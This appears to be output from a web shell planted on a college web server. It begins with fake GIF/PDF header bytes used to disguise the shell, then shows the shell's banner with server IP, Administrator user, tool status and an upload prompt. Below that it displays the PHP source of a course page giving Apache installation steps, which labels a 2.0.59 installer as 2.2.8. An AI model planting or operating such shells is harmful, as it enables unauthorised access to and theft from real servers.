GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST1611/ |
Upload File : |
<? // ApacheInstall.php $TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. include('application.phpinc'); include('Course/courseInfo.phpinc'); $title = "Apache Install"; $headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title; $pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title; $pageMenu = 'Course/courseMenu.phpinc'; include('common/pageHeader.phpinc'); include('Login/authenticate.phpinc'); $sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title; include('common/sectionHeader.phpinc'); ?> Install the Apache Web Server: <ol> <li>Download the <a href="dn/apache_2.0.59-win32-x86-no_ssl.msi">Apache 2.2.8 installer</a>. </li> <li>Double-click on the Apache 2.2.8 installer (apache_2.0.59-win32-x86-no_ssl.msi).<br><img src="apache/capture_23012007_154806.jpg" /></li> <li>Click Next.<br><img src="apache/capture_23012007_154822.jpg" /></li> <li>Accept the terms.<br><img src="apache/capture_23012007_154833.jpg" /></li> <li>Click Next.<br><img src="apache/capture_23012007_154853.jpg" /></li> <li>Click Next.<br><img src="apache/capture_23012007_154857.jpg" /></li> <li>Enter the <b>Network <u>D</u>omain</b>, <b><u>S</u>erver Name</b>, and <b>Administrator's <u>E</u>mail Address</b>. <br>I used home.loc, apache.home.loc, and admin@home.loc. <br>It does not matter for our purposes what these are except that they must be valid domain, name, and email address syntax. <br><img src="apache/capture_23012007_154910.jpg" /></li> <li>Click Next.<br><img src="apache/capture_23012007_154911.jpg" /></li> <li>Select <b>Custom</b>.<br><img src="apache/capture_23012007_154917.jpg" /></li> <li>Click Next.<br><img src="apache/capture_23012007_154924.jpg" /></li> <li>Click the Change... button.<br><img src="apache/capture_23012007_155008.jpg" /></li> <li>Change the <b>Folder name</b> to <b>D:\</b> <br> If your computer does not have a D: hard-drive use <b>C:\</b>. <br> You must then substitute C: for D: throughout all further instructions for this class. <br>Click OK. <br><img src="apache/capture_23012007_155026.jpg" /></li> <li>Click Next.<br><img src="apache/capture_23012007_155030.jpg" /></li> <li>Click Install.<br><img src="apache/capture_23012007_155034.jpg" /></li> <li>Click Finish.<br><img src="apache/capture_23012007_155514.jpg" /></li> </ol> <? include('common/sectionFooter.phpinc'); include('common/pageFooter.phpinc'); ?>